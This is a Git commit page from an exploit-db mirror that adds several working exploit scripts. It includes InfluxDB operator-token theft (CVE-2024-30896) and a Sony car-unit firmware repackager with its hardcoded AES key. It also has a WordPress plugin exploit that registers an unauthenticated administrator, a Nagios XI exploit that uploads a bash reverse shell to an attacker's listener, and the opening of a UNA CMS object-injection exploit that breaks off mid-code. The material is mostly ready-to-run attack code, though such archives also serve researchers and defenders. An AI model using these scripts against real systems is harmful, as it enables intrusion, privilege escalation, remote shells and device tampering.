bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Merge remote-tracking branch 'exploitdb/main'

Browse source
This commit is contained in:
Brendan McDevitt 2025-04-10 00:01:14 +00:00
commit 6a8464a842
9 changed files with 1114 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

221
exploits/multiple/remote/52142.py Executable file
View file

@ -0,0 +1,221 @@
# Exploit Title: InfluxDB OSS Operator Privilege Escalation via BusinessLogic Flaw
# Date: 22/03/2024
# Exploit Author: Andrea Pasin (Xenom0rph97)
# Researcher Homepage: https://xenom0rph97.github.io/xeno/
# GitHub Exploit repo: https://github.com/XenoM0rph97/CVE-2024-30896
# Software Link: https://www.influxdata.com/products/influxdb/
# Version: 2.x <=> 2.7.11
# Tested on: InfluxDB OSS 2.x
# CVE: CVE-2024-30896
# CVSS Base Score: 9.1
# CVSS v3.1 Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
# CVE-2024-30896
## Summary
A business logic flaw in influxdb allows users who own a valid allAccess
token to escalate their privileges at operator level by listing current
authorization tokens.
## Scenario
Attacker might be a user which was gained access by an administrator via an
allAccess token only within their organization.
This user's permissions will allow full control over the organization but
will still prevent him to interact with other orgs.
## Impact
This vulnerability would allow a user to obtain unrestricted access to the
influxdb instance. A similar condition might fully compromise
Confidentiality, Integrity and Availability of data owned by users of
different organizations. Additionally, since operator token has
administrative permissions, Availability and Integrity of the entire
influxdb instance might be compromised.
## Prerequisites/Limitations
1. Attacker must have a valid allAccess token
2. allAccess token must have been created in the same Org where an operator
token resides (ex. same Org as Admin user)
3. Attacker must be able to interact with influxdb instance via CLI or APIs
(influxClient)
## Steps to Reproduce
### Case 1: Exploitation via influxdb APIs:
*Python Version*: 3
*Requirements*: `influxdb_client==1.41.0`
*Script usage*
```
% python3 ./CVE-2024-30896.py -h
usage: CVE-2024-30896.py [-h] [-t TOKEN] [-e ENDPOINTURL] [-v [VERBOSE]]
[-vv [VVERBOSE]]
optional arguments:
-h, --help show this help message and exit
-t TOKEN, --token TOKEN
Custom or allAccess token to access influx DB
instance
-e ENDPOINTURL, --endpointUrl ENDPOINTURL
Endpoint Url of influxdb instance (ex. "
https://myInfluxdbInstance:8086/")
-v [VERBOSE], --verbose [VERBOSE]
Enable verbose logging - INFO
-vv [VVERBOSE], --vverbose [VVERBOSE]
Enable verbose logging - DEBUG
```
### Case 2: Exploitation via influx CLI
1. Execute: `influx auth ls -t <allAccessToken> | grep write:/orgs`. This
will list all current active operator tokens on the influxdb instance.
*Example*
```
# Using an allAccess token
influx auth ls -t U1OuqmFC{REDACTED} | grep U1OuqmFC{REDACTED}
0cc41c3b050e5000 U1OuqmFC{REDACTED}
admin 0cb9c92ee228b000 [read:orgs/87d0746948a3b3f5/authorizations
write:orgs/87d0746948a3b3f5/authorizations
read:orgs/87d0746948a3b3f5/buckets write:orgs/87d0746948a3b3f5/buckets
read:orgs/87d0746948a3b3f5/dashboards
write:orgs/87d0746948a3b3f5/dashboards read:/orgs/87d0746948a3b3f5
read:orgs/87d0746948a3b3f5/sources write:orgs/87d0746948a3b3f5/sources
read:orgs/87d0746948a3b3f5/tasks write:orgs/87d0746948a3b3f5/tasks
read:orgs/87d0746948a3b3f5/telegrafs write:orgs/87d0746948a3b3f5/telegrafs
read:/users/0cb9c92ee228b000 write:/users/0cb9c92ee228b000
read:orgs/87d0746948a3b3f5/variables write:orgs/87d0746948a3b3f5/variables
read:orgs/87d0746948a3b3f5/scrapers write:orgs/87d0746948a3b3f5/scrapers
read:orgs/87d0746948a3b3f5/secrets write:orgs/87d0746948a3b3f5/secrets
read:orgs/87d0746948a3b3f5/labels write:orgs/87d0746948a3b3f5/labels
read:orgs/87d0746948a3b3f5/views write:orgs/87d0746948a3b3f5/views
read:orgs/87d0746948a3b3f5/documents write:orgs/87d0746948a3b3f5/documents
read:orgs/87d0746948a3b3f5/notificationRules
write:orgs/87d0746948a3b3f5/notificationRules
read:orgs/87d0746948a3b3f5/notificationEndpoints
write:orgs/87d0746948a3b3f5/notificationEndpoints
read:orgs/87d0746948a3b3f5/checks write:orgs/87d0746948a3b3f5/checks
read:orgs/87d0746948a3b3f5/dbrp write:orgs/87d0746948a3b3f5/dbrp
read:orgs/87d0746948a3b3f5/notebooks write:orgs/87d0746948a3b3f5/notebooks
read:orgs/87d0746948a3b3f5/annotations
write:orgs/87d0746948a3b3f5/annotations read:orgs/87d0746948a3b3f5/remotes
write:orgs/87d0746948a3b3f5/remotes read:orgs/87d0746948a3b3f5/replications
write:orgs/87d0746948a3b3f5/replications]
# Listing all available tokens passing allAccess token and retrieving only
operator level tokens
influx auth ls -t U1OuqmFC{REDACTED} | grep write:/orgs
0cbb920e128e5000 gerKYLO0Ph_ibUk0y{REDACTED}
admin 0cb9c92ee228b000 [read:/authorizations write:/authorizations
read:/buckets write:/buckets read:/dashboards write:/dashboards read:/orgs
write:/orgs read:/sources write:/sources read:/tasks write:/tasks
read:/telegrafs write:/telegrafs read:/users write:/users read:/variables
write:/variables read:/scrapers write:/scrapers read:/secrets
write:/secrets read:/labels write:/labels read:/views write:/views
read:/documents write:/documents read:/notificationRules
write:/notificationRules read:/notificationEndpoints
write:/notificationEndpoints read:/checks write:/checks read:/dbrp
write:/dbrp read:/notebooks write:/notebooks read:/annotations
write:/annotations read:/remotes write:/remotes read:/replications
write:/replications]
influxdb_client==1.41.0
import influxdb_client
import argparse
import logging
import sys
argParser = argparse.ArgumentParser()
argParser.add_argument("-t", "--token", type=str, help="Custom or allAccess token to access influx DB instance")
argParser.add_argument("-e", "--endpointUrl", type=str, help="Endpoint Url of influxdb instance (ex. \"https://myInfluxdbInstance:8086/\")")
argParser.add_argument("-v", "--verbose", type=bool, const=True, nargs='?', help="Enable verbose logging - INFO")
argParser.add_argument("-vv", "--vverbose", type=bool, const=True, nargs='?', help="Enable verbose logging - DEBUG")
args = argParser.parse_args()
# Using user retrieved values or default (hardcoded) ones
all_access_token = "<allAccessToken>"
influx_endpoint_url = "<influxdbEndpointUrl>"
# Defining some colors
red = "\033[31m"
yellow = "\033[93m"
purple = "\33[1;95m"
green = "\033[0;92m"
cyan = "\033[96m"
bold ="\033[1m"
endc = "\033[39m"
if args.vverbose == True:
logging.basicConfig(level=logging.DEBUG)
elif args.verbose == True:
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger()
if args.token:
token = args.token
else:
logger.debug(f"{yellow}User did not set a token, using default one{endc}")
token = all_access_token
if args.endpointUrl:
endpointUrl = args.endpointUrl
else:
logger.debug(f"{yellow}User did not set an endpoint Url for influxdb, using default one{endc}")
endpointUrl = influx_endpoint_url
logger.info(f"{cyan}Connecting to influx DB instance{endc}")
# Connecting to influxdb instance
try:
conn = influxdb_client.InfluxDBClient(
url=endpointUrl,
token=token,
debug=False,
verify_ssl=True
)
# Verify InfluxDB connection
health = conn.ping()
if not health:
logger.error(f"{red}Unable to connect to db instace " + endpointUrl + f"{endc}")
print(f"{red}Quitting execution...{endc}")
sys.exit(1)
except Exception as e:
logger.error(f"{red}Failed to connect to db instance: " + endpointUrl + " Error: " + str(e) + f"{endc}")
print(f"{red}Quitting execution...{endc}")
sys.exit(1)
# Retrieving all current auths
logger.debug(f"{yellow}Retrieving all auth tokens{endc}")
print(f"{cyan}Enumerating current authorizations...{endc}")
try:
auths = conn.authorizations_api().find_authorizations()
except Exception as e:
logger.error(f"{red}Unable to retrieve authorizations. ERR: " + str(e) +f"{endc}")
print(f"{red}Unable to retrieve authorizations. Quitting...{endc}")
sys.exit(1)
if not auths:
print(f"{cyan}No Authorization tokens found on the instance{endc}")
sys.exit(1)
print(f"{cyan}{str(len(auths))} tokens found on the instance{endc}\n")
# Extracting operator token -> Parsing permissions to look for ("org = None" and "authType = write/auths"), not 100% efficiency -> TO OPTIMIZE
logger.debug(f"{yellow}Parsing auth permissions to retrieve operator tokens{endc}")
print(f"{cyan}Enumerating all operator tokens:{endc}")
op_tokens = []
# In order to understand if a token is of type "operator" we need to enumerate all permissions and look for "write/auths" on org 'None' -> Unrescticted access
try:
for auth in auths:
if auth.permissions:
for perm in auth.permissions:
if perm.action == "write" and perm.resource.org == None and perm.resource.type == "authorizations":
op_tokens.append(auth.token)
except Exception as e:
logger.error(f"{red}Unable to parse permissions on found authorizations. ERR: " + str(e) + f"{endc}")
print(f"{red}Unable to parse permissions on found authorizations. Quitting execution...{endc}")
sys.exit(1)
logger.info(f"{cyan}Printing all operator auth tokens{endc}")
print(f"{cyan}{str(len(op_tokens))} operator tokens found.\n\nListing all operator tokens:\n{endc}")
for op_t in op_tokens:
print(f"{green}{op_t}{endc}")

355
exploits/multiple/remote/52143.py Executable file
View file

@ -0,0 +1,355 @@
# Exploit Title: Sony XAV-AX5500 Firmware Update Validation Remote Code Execution
# Date: 11-Feb-2025
# Exploit Author: lkushinada
# Vendor Homepage: https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500
# Software Link: https://archive.org/details/xav-ax-5500-v-113
# Version: 1.13
# Tested on: Sony XAV-AX5500
# CVE : CVE-2024-23922
# From NIST CVE Details:
# ====
# This vulnerability allows physically present attackers to execute arbitrary code on affected
# installations of Sony XAV-AX5500 devices. Authentication is not required to exploit this
# vulnerability. The specific flaw exists within the handling of software updates. The issue
# results from the lack of proper validation of software update packages. An attacker can leverage
# this vulnerability to execute code in the context of the device.
# Was ZDI-CAN-22939
# ====
# # Summary
# Sony's firmware validation for a number of their XAV-AX products relies on symetric cryptography,
# obscurity of their package format, and a weird checksum method instead of any real firmware
# signing mechanism. As such, this can be exploited to craft updates which bypass firmware validation
# and allow a USB-based attacker to obtain RCE on the infotainment unit.
# What's not mentioned in the CVE advisories, is that this method works on the majority of Sony's
# infotainment units and products which use a similar chipset or firmware package format. Tested
# to work on most firmware versions prior to v2.00.
# # Threat Model
# An attacker with physical access to an automotive media unit can typically utilize other methods
# to achieve a malicious outcome. The reason to investigate the firmware to the extent in this post
# is academic, exploratory, and cautionary, i.e. what other systems are protected in a similar
# manner? if they are, how trivial is it to bypass?
# # Disclaimer
# The information in this article is for educational purposes only.
# Tampering with an automotive system comes with risks which, if you don't understand, you should
# not be undertaking.
# THE AUTHORS DISCLAIM ANY AND ALL RESPONSIBILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES ARISING
# FROM THE USE OF ANYTHING IN THIS DOCUMENT.
# # The Unit
# ## Processors
# - DAC
# - System Management Controller (SMC)
# - Applications Processor
# - Display Processor
# Coming from a mobile and desktop computer environment, one may be use to thinking about
# the Applications Processor as the most powerful chip in the system in terms of processing power,
# size, power consumption, and system hierarchy. The first oddity of this platform is that the
# application processor is not the most powerful; that honor goes to the DAC, a beefy ARM chip on the
# board.
# The application processor does not appear to be the orchestrator of the components on the system.
# The SMC tkes which takes the role of watchdog, power state management, and input (think remote
# controls, steering wheel button presses) routing.
# For our purposes, it is the Applications processor we're interested in, as it is
# the system responsible for updating the unit via USB.
# ## Interfaces
# We're going to be attacking the unit via USB, as it's the most readily exposed
# interface to owners and would-be attackers.
# Whilst the applications processor does have a UART interface, the most recent iterations of the
# unit do not expose any headers for debugging via UART, and the one active UART line found to be
# active was for message passing between the SMC and app processor, not debug purposes. Similarly, no
# exposed JTAG interfaces were found to be readily exposed on recent iterations of the unit. Sony's
# documentation suggests these are not enabled, but this could not be verified during testing. At the
# very least, JTAG was not found to be exposed on an accessible interface.
# ## Storage
# The boards analyzed had two SPI NOR flash chips, one with an unencrypted firmware image on it. This
# firmware was RARd. The contents of SPI flash was analyzed to determine many of the details
# discussed in this report.
# ## The Updater
# Updates are provided on Sony's support website. A ZIP package is provided with three files:
# - SHDS1132.up6
# - SHMC1132.u88
# - SHSO1132.fir
# The largest of these files (8 meg), the .fir, is in a custom format, and appears encrypted.
# The FIR file has a header which contains the date of firmware publication, the strings KRSELCO and
# SKIP, a chunk of zeros, and then a highish entropy section, and some repeating patterns of interest:
# 00002070 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# *
# 00002860 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# 00744110 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# *
# 00800020 b7 72 10 03 00 8c 82 7e aa d1 83 58 23 ef 82 5c |.r.....~...X#..\|
# ## SPI Flash
# Dumping the contents of the SPI flash shows a similar layout, with slightly different offsets:
# 00001fe0 10 10 10 10 10 10 10 10 ff ff ff ff ff ff ff ff |................|
# 00001ff0 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
# *
# 000027f0 ff ff ff ff ff ff ff ff ff ff ff ff 00 03 e7 52 |...............R|
# 00002800 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......|
#
# 0007fff0 ff ff ff ff ff ff ff ff ff ff ff ff 00 6c 40 8b |.............l@.|
# 00080000 52 61 72 21 1a 07 00 cf 90 73 00 00 0d 00 00 00 |Rar!.....s......|
# ...
# 00744090 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |................|
# *
# 00778000
#
# This given the offsets and spacing, we suspect that the .FIR matches the contents of the SPI.
# Decompressing the RARs at the 0x2800 and 0x80000, we get the recovery and main applications.
# Once we remove the packaging bytes, seeing that the repetive patterns align with FF's, gives
# us a strong indication the encryption function is operating in an ECB-style configuration,
# giving us an avenue, even if we do not recover the key, to potentially make modifications
# to the firmware depending on how the checksum is being calculated.
# ## Firmware
# The recovery application contains the decompression, decryption and checksum methods.
# Putting the recovery_16.bin into ghidra and setting the memory map to load us in at 0x2800,
# we start taking a look at the relevant functions by way of:
# - looking for known strings (KRSELCO)
# - analyizing the logic and looking for obvious "if this passed, begin the update, else fail"
# - looking for things that look like encryption (loads of bitshifting math in one function)
# Of interest to us, there is:
# - 0x0082f4 - a strcmp between KRSELCO and the address the incoming firmware update is at, plus 0x10
# - 0x00897a - a function which sums the total number of bytes until we hit 0xA5A5A5A5
# - 0x02d4ce - the AES decryption function
# - 0x040dd4 - strcmp (?)
# - 0x040aa4 - memcpy (?)
# - 0x046490 - the vendor plus the a number an idiot would use for their luggage, followed by enough
# padding zeros to get us to a 16 byte key
# This gives us all the information we need, other than making some guesses as to the general package
# and header layout of the update package, to craft an update packager that allows arbitrary
# modification of the firmware.
# # Proof of Concept
# The PoC below will take an existing USB firmware update, decrypt and extract the main binary,
# pause whilst you make modifications (e.g. changing the logic or modifying a message), and repackage
# the update.
# ## Requirements
# - Unixish system
# - WinRar 2.0 (the version the Egyptians built the pyramids with)
# ## Usage
# cve-2024-23922.py path_to_winrar source.fir output.fir
import argparse
import sys
import os
import tempfile
import shutil
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
# Filenames as found in the .FIR
MAIN_BINARY_NAME="main_16.bin"
MAIN_RAR_NAME="main_16.rar"
DECRYPTED_FILE_NAME="decrypt.bin"
ENCRYPTED_FILE_NAME="encrypt.bin"
# Offsets in the .FIR
HEADER_LENGTH=0x80
RECOVERY_OFFSET=0x2800
MAIN_OFFSET=0x80000
CHECKSUM_OFFSET=0x800000-0x10
CHECKSUM_SIZE=0x4
RAR_LENGTH_OFFSET=0x4
RAR_LENGTH_SIZE=0x4
# From 0x46490 in recovery_16.bin
ENCRYPTION_KEY=b'\x54\x41\x4d\x55\x4c\x31\x32\x33\x34\x00\x00\x00\x00\x00\x00\x00'
def decrypt_file(input_file, output_file):
backend = default_backend()
cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
decryptor = cipher.decryptor()
with open(input_file, 'rb') as file:
ciphertext = file.read()
# Strip the unencrypted header
ciphertext = ciphertext[HEADER_LENGTH:]
decrypted_data = decryptor.update(ciphertext) + decryptor.finalize()
with open(output_file, 'wb') as file:
file.write(decrypted_data)
def aes_encrypt_file(input_file, output_file):
backend = default_backend()
cipher = Cipher(algorithms.AES(ENCRYPTION_KEY), modes.ECB(), backend=backend)
encryptor = cipher.encryptor()
with open(input_file, 'rb') as file:
plaintext = file.read()
ciphertext = encryptor.update(plaintext) + encryptor.finalize()
with open(output_file, 'wb') as file:
file.write(ciphertext)
def get_sony_32(data):
csum = int()
for i in data:
csum = csum + i
return csum % 2147483648 # 2^31
def validate_args(winrar_path, source_file, destination_file):
# Check if the WinRAR executable exists and is a file
if not os.path.isfile(winrar_path) or not os.access(winrar_path, os.X_OK):
print(f"[x] Error: The specified WinRAR path '{winrar_path}' is not a valid executable.")
sys.exit(1)
# Check if the source file exists
if not os.path.isfile(source_file):
print(f"[x] Error: The specified source file '{source_file}' does not exist.")
sys.exit(1)
# Read 8 bytes from offset 0x10 in the source file
try:
with open(source_file, 'rb') as f:
f.seek(0x10)
signature = f.read(8)
if signature != b'KRSELECO':
print(f"[x] Error: The source file '{source_file}' does not contain the expected signature.")
sys.exit(1)
except Exception as e:
print(f"[x] Error: Failed to read from '{source_file}': {e}")
sys.exit(1)
# Check if the destination file already exists
if os.path.exists(destination_file):
print(f"[x] Error: The destination file '{destination_file}' already exists.")
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description="CVE-2024-23922 Sony XAV-AX5500 Firmware Modifier")
parser.add_argument("winrar_path", help="Path to WinRAR 2.0 executable (yes, the ancient one)")
parser.add_argument("source_file", help="Path to original .FIR file")
parser.add_argument("destination_file", help="Path to write the modified .FIR file to")
args = parser.parse_args()
validate_args(args.winrar_path, args.source_file, args.destination_file)
RAR_2_PATH = args.winrar_path
GOOD_FIRMWARE_FILE = args.source_file
DESTINATION_FIRMWARE_FILE = args.destination_file
# make temporary directory
workdir = tempfile.mkdtemp(prefix="sony_firmware_modifications")
# copy the good firmware file into the temp directory
temp_fir_file = os.path.join(workdir, os.path.basename(GOOD_FIRMWARE_FILE))
shutil.copyfile(GOOD_FIRMWARE_FILE, temp_fir_file)
print("[+] Cutting the head off and decrypting the contents")
decrypted_file_path = os.path.join(workdir, DECRYPTED_FILE_NAME)
decrypt_file(input_file=temp_fir_file, output_file=decrypted_file_path)
print("[+] Dump out the rar file")
with open(decrypted_file_path, 'rb') as file:
# right before the rar file there is a 4 byte length header for the rar file. get that.
file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)
original_rar_length = int.from_bytes(file.read(RAR_LENGTH_SIZE), "big")
rar_file_bytes = file.read(original_rar_length)
# now dump that out
rar_file_path=os.path.join(workdir, MAIN_RAR_NAME)
with open(rar_file_path, 'wb') as rarfile:
rarfile.write(rar_file_bytes)
# check that the stat of the file matches what the header told us
dumped_rar_size = os.stat(rar_file_path).st_size
if dumped_rar_size != original_rar_length:
print("[!] extracted filesizes dont match, there may be corruption", dumped_rar_size, original_rar_length)
print("[+] Extracting the main binary from the rar file")
os.system("unrar x " + rar_file_path + " " + workdir)
print("[!] Okay, I'm now going to wait until you have had a chance to make modifications")
print("Please modify this file:", os.path.join(workdir, MAIN_BINARY_NAME))
input()
print("[+] Continuing")
print("[+] Putting your main binary back into the rar file")
os.system("wine " + RAR_2_PATH + " u -tk -ep " + rar_file_path + " " + workdir + "/" + MAIN_BINARY_NAME)
# we could fix this by writing some FFs
new_rar_size=os.stat(rar_file_path).st_size
if dumped_rar_size > os.stat(rar_file_path).st_size:
print("[!!] The rar size is smaller than the old one. This might cause a problem.")
print("[!!] Push any key to continue, ctrl+c to abort")
input()
with open(decrypted_file_path, 'r+b') as file:
# right before the rar file there is a 4 byte length header for the rar file. go back there
file.seek(MAIN_OFFSET-RAR_LENGTH_OFFSET)
# overwrite the old size with the new size
file.write(new_rar_size.to_bytes(RAR_LENGTH_SIZE, "big"))
print("[+] Deleting the old rar from the main container")
# delete the old rar from the main container by FFing it up
file.write(b'\xFF'*original_rar_length)
# seek back to the start
file.seek(MAIN_OFFSET)
print("[+] Loading the new rar back into the main container")
with open(rar_file_path, 'rb') as rarfile:
new_rarfile_bytes = rarfile.read()
file.write(new_rarfile_bytes)
print("[+] Updating Checksum")
with open(decrypted_file_path, 'rb') as file:
contents = file.read()
contents = contents[:-0x0010]
s32_sum = get_sony_32(contents)
with open(decrypted_file_path, 'r+b') as file:
file.seek(CHECKSUM_OFFSET)
# read out the current checksum
old_checksum_bytes=file.read(CHECKSUM_SIZE)
print("old checksum:", int.from_bytes(old_checksum_bytes, "big"), old_checksum_bytes)
# go back and update it with new checksum
print("new checksum:", s32_sum, hex(s32_sum))
new_checksum_bytes=s32_sum.to_bytes(CHECKSUM_SIZE, "big")
file.seek(CHECKSUM_OFFSET)
file.write(new_checksum_bytes)
print("[+] Encrypting the main container back up")
encrypted_file_path = os.path.join(workdir, ENCRYPTED_FILE_NAME)
aes_encrypt_file(decrypted_file_path, encrypted_file_path)
print("[+] Reattaching the main container to the header and writing to dest")
with open(DESTINATION_FIRMWARE_FILE, 'wb') as file:
with open(temp_fir_file, 'rb') as firfile:
header = firfile.read(HEADER_LENGTH)
file.write(header)
with open(encrypted_file_path, 'rb') as encfile:
enc_contents = encfile.read()
file.write(enc_contents)
print("[+] DONE!!! Any key to delete temp files, ctrl+c to keep them.")
input()
shutil.rmtree(workdir)
if __name__ == "__main__":
main()

126
exploits/multiple/webapps/52137.txt Normal file
View file

@ -0,0 +1,126 @@
# Exploit Title: WordPress User Registration & Membership Plugin <= 4.1.1 - Unauthenticated Privilege Escalation
# Exploit Author: Al Baradi Joy
# Date: 2025-04-07
# Vendor Homepage: https://wordpress.org/plugins/user-registration/
# Software Link:
https://downloads.wordpress.org/plugin/user-registration.4.1.1.zip
# Version: <= 4.1.1
# Tested on: WordPress 6.4.3
# CVSS: 9.8 (CRITICAL)
# CWE: CWE-269
# References:
# https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-411-unauthenticated-privilege-escalation
# https://patchstack.com/database/wordpress/plugin/user-registration/vulnerability/wordpress-user-registration-membership-plugin-4-1-2-unauthenticated-privilege-escalation-vulnerability
# https://nvd.nist.gov/vuln/detail/CVE-2025-2563
import re
import json
import requests
import random
import string
from urllib.parse import urljoin
def banner():
print("\n[+] CVE-2025-2563 - WP User Registration Privilege Escalation")
print("[+] Made By Al Baradi Joy\n")
def randstring(n=8):
return ''.join(random.choices(string.ascii_lowercase, k=n))
def get_regex(content, pattern, group=1, name=""):
match = re.search(pattern, content)
if not match:
raise ValueError(f"[-] Could not extract {name} (Pattern:
{pattern})")
return match.group(group)
def exploit(target):
session = requests.Session()
username = randstring()
password = randstring() + "!@"
email = f"{username}@exploit.test"
try:
print("[+] Getting registration page...")
r = session.get(urljoin(target, "/membership-registration/"),
timeout=10)
r.raise_for_status()
page = r.text
nonce = get_regex(page,
r'"user_registration_form_data_save":"(.*?)"', name="nonce")
formid = get_regex(page, r"id='user-registration-form-([0-9]+)'",
name="formid")
memval = get_regex(page,
r'id="ur-membership-select-membership-([0-9]+)', name="membership value")
memname = get_regex(page,
r'data-field-id="membership_field_([0-9]+)"', name="membership field name")
front_nonce = get_regex(page, r'name="ur_frontend_form_nonce"
value="(.*?)"', name="frontend_nonce")
loc_nonce = get_regex(page, r'ur_membership_frontend_localized_data
= {"_nonce":"(.*?)"', name="localized_frontend_nonce")
print("[+] Submitting registration form...")
form_data = [
{"field_name": "user_login", "value": username, "field_type":
"text", "label": "Username"},
{"field_name": "user_email", "value": email, "field_type":
"email", "label": "User Email"},
{"field_name": "user_pass", "value": password, "field_type":
"password", "label": "User Password"},
{"field_name": "user_confirm_password", "value": password,
"field_type": "password", "label": "Confirm Password"},
{"value": memval, "field_type": "radio", "label": "membership",
"field_name": f"membership_field_{memname}"}
]
payload = {
"action": "user_registration_user_form_submit",
"security": nonce,
"form_data": json.dumps(form_data),
"form_id": formid,
"registration_language": "en-US",
"ur_frontend_form_nonce": front_nonce,
"is_membership_active": memval,
"membership_type": memval
}
r2 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"),
data=payload, timeout=10)
if '"success":true' not in r2.text:
print("[-] Registration form failed.")
return
print("[+] Sending membership registration as administrator...")
member_payload = {
"action": "user_registration_membership_register_member",
"security": loc_nonce,
"members_data": json.dumps({
"membership": "1",
"payment_method": "free",
"start_date": "2025-3-29",
"username": username,
"role": "administrator"
})
}
r3 = session.post(urljoin(target, "/wp-admin/admin-ajax.php"),
data=member_payload, timeout=10)
if '"success":true' in r3.text:
print("[+] Exploit Successful!")
print(f"[+] Admin Username: {username}")
print(f"[+] Admin Password: {password}")
else:
print("[-] Membership escalation failed.")
except Exception as e:
print(f"[-] Exploit failed: {str(e)}")
if __name__ == "__main__":
banner()
target = input("Enter target WordPress site (e.g., http://example.com):
").strip().rstrip('/')
if not target.startswith("http"):
target = "http:

90
exploits/multiple/webapps/52138.txt Normal file
View file

@ -0,0 +1,90 @@
# Exploit Title: Nagiosxi authenticated Remote Code Execution
# Date: 17/02/2024
# Exploit Author: Calil Khalil
# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
# Version: Nagios Xi 5.6.6
# Tested on: Ubuntu
# CVE : CVE-2019-15949
#
# python3 exp.py -t https://<target>/ -b /<nagiosxi-path>/ -u user -p 'password' -lh <rev-ip> -lp <rev-port> -k (ignore cert)
#
import argparse
import re
import requests
import urllib3
class Nagiosxi():
def __init__(self, target, parameter, username, password, lhost, lport, ignore_ssl):
self.url = target
self.parameter = parameter
self.username = username
self.password = password
self.lhost = lhost
self.lport = lport
self.ignore_ssl = ignore_ssl
self.login()
def upload(self, session):
print("Uploading Malicious Check Ping Plugin")
upload_url = self.url + self.parameter + "/admin/monitoringplugins.php"
upload_token = session.get(upload_url, verify=not self.ignore_ssl)
nsp = re.findall('var nsp_str = "(.*)";', upload_token.text)
print("Upload NSP Token: " + nsp[0])
payload = "bash -c 'bash -i >& /dev/tcp/" + self.lhost + "/" + self.lport + " 0>&1'"
file_data = {
"upload": "1",
"nsp": nsp[0],
"MAX_FILE_SIZE": "20000000"
}
file_upload = {
"uploadedfile": ("check_ping", payload, "application/octet-stream", {"Content-Disposition": "form-data"})
}
session.post(upload_url, data=file_data, files=file_upload, verify=not self.ignore_ssl)
payload_url = self.url + self.parameter + "/includes/components/profile/profile.php?cmd=download"
session.get(payload_url, verify=not self.ignore_ssl)
def login(self):
session = requests.Session()
login_url = self.url + self.parameter + "/login.php"
token = session.get(login_url, verify=not self.ignore_ssl)
nsp = re.findall('name="nsp" value="(.*)">', token.text)
print("Login NSP Token: " + nsp[0])
post_data = {
"nsp": nsp[0],
"page": "auth",
"debug": "",
"pageopt": "login",
"redirect": "",
"username": self.username,
"password": self.password,
"loginButton": ""
}
login = session.post(login_url, data=post_data, verify=not self.ignore_ssl)
if "Home Dashboard" in login.text:
print("Logged in!")
else:
print("Unable to login!")
self.upload(session)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='CVE-201915949 Nagiosxi authenticated Remote Code Execution')
parser.add_argument('-t', metavar='<Target base URL>', help='Example: -t http://nagios.url/', required=True)
parser.add_argument('-b', metavar='<Base Directory>', help="Example: -b /nagiosxi/", required=True)
parser.add_argument('-u', metavar='<Username>', help="Example: -a username", required=True)
parser.add_argument('-p', metavar='<Password>', help="Example: -p 'password'", required=True)
parser.add_argument('-lh', metavar='<Listener IP>', help="Example: -lh 127.0.0.1", required=True)
parser.add_argument('-lp', metavar='<Listener Port>', help="Example: -lp 1337", required=True)
parser.add_argument('-k', action='store_true', help="Ignore SSL certificate verification")
args = parser.parse_args()
urllib3.disable_warnings()
try:
print('CVE-2019-15949 Nagiosxi authenticated Remote Code Execution')
Nagiosxi(args.t, args.b, args.u, args.p, args.lh, args.lp, args.k)
except KeyboardInterrupt:
print("\nBye Bye!")
exit()

125
exploits/multiple/webapps/52139.txt Normal file
View file

@ -0,0 +1,125 @@
# Exploit Title: UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
# Author: Egidio Romano aka EgiX
# Software link.......: https://unacms.com
[-] Software Links:
https://unacms.com
https://github.com/unacms/una
[-] Affected Versions:
All versions from 9.0.0-RC1 to 14.0.0-RC4.
[-] Vulnerability Description:
The vulnerability is located in the
/template/scripts/BxBaseMenuSetAclLevel.php script. Specifically,
within the BxBaseMenuSetAclLevel::getCode() method. When calling this
method, user input passed through the "profile_id" POST parameter is
not properly sanitized before being used in a call to the
unserialize() PHP function. This can be exploited by remote,
unauthenticated attackers to inject arbitrary PHP objects into the
application scope, allowing them to perform a variety of attacks, such
as writing and executing arbitrary PHP code.
<?php
/*
------------------------------------------------------------------------------------
UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
------------------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://unacms.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Vulnerability Description:
The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script.
Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this
method, user input passed through the "profile_id" POST parameter is not properly
sanitized before being used in a call to the unserialize() PHP function. This can be
exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into
the application scope, allowing them to perform a variety of attacks, such as
writing and executing arbitrary PHP code.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2025-01
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+------------------------------------------------------------+";
print "\n| UNA CMS <= 14.0.0-RC4 PHP Object Injection Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 2)
{
